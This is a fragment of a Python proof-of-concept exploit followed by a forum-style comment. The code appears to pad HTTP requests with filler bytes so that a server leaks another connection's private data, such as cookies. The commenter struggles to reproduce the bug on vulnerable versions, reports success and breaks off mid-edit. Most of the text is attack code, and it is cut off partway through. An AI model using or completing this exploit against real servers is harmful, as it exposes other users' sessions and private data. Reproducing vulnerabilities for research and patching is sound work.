def round_up(n, r):
    return int((n + r - 1) / r) * r
s = socket.socket()
buf = "GET / HTTP/1.1\r\nHost: localhost\r\nConnection: close\r\nX:\r\n "
s2 = socket.socket()
buf2 = "This is private data, perhaps an HTTP request with a Cookie in it."
s.sendall("A" * (3 + round_up(len(buf), 16) - len(buf) + round_up(len(buf2), 16)) + "\r\n\r\n")
b = s.recv(1024)
if not b:

Hey, I was trying to reproduce the vulnerability, and I can't get the "private" data...
I tried a lot of versions from those that were marked as vulnerable, and I couldn't get the data as you did. Is there anything else that I need to know?
Ty in advance ;)
EDIT: I finally got it to work, but in line 24 of stringptr-update-poc-client.py I needed to change it to: